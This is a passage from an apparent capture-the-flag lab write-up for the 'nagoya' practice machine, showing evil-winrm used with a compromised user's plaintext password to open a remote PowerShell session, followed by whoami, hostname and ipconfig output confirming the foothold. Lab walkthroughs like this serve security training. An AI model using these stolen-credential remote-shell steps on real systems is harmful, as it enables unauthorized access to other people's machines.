WinRM


Now that I have compromised the christopher.lewis user, who is a member of the Remote Management Users group, I can establish a WinRM session to the target system.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ evil-winrm -i nagoya.nagoya-industries.com -u christopher.lewis -p Qwer1234
 
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> whoami
nagoya-ind\christopher.lewis
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> hostname
nagoya
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.158.21
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.158.254

Initial foothold established on the target system as the christopher.lewis user via WinRM.